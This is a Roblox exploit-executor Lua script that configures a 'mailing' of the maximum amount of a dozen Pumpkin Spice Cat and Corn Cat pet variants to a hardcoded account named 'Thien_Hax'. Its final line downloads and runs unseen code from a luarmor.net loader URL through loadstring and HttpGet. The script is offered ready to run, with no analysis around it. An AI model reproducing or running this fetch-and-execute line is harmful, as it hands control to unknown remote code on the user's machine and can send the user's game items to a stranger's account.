getgenv().Settings = {
    Mailing = {
        ["Pumpkin Spice Cat"] = {Class = "Pet", Amount = "Max"},
		["Golden Pumpkin Spice Cat"] = {Class = "Pet", Amount = "Max"},
		["Rainbow Pumpkin Spice Cat"] = {Class = "Pet", Amount = "Max"},
		["Shiny Pumpkin Spice Cat"] = {Class = "Pet", Amount = "Max"},
		["Shiny Golden Pumpkin Spice Cat"] = {Class = "Pet", Amount = "Max"},
		["Shiny Rainbow Pumpkin Spice Cat"] = {Class = "Pet", Amount = "Max"},
		["Corn Cat"] = {Class = "Pet", Amount = "Max"},
		["Golden Corn Cat"] = {Class = "Pet", Amount = "Max"},
		["Rainbow Corn Cat"] = {Class = "Pet", Amount = "Max"},
        ["Shiny Corn Cat"] = {Class = "Pet", Amount = "Max"},
		["Shiny Golden Corn Cat"] = {Class = "Pet", Amount = "Max"},
		["Shiny Rainbow Corn Cat"] = {Class = "Pet", Amount = "Max"},
    },
    Users = {
        "Thien_Hax",
    },
    ["Split Items Evenly"] = true, --// False -> it will send the Amount per account.
    ["Only Online Accounts"] = false,
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()
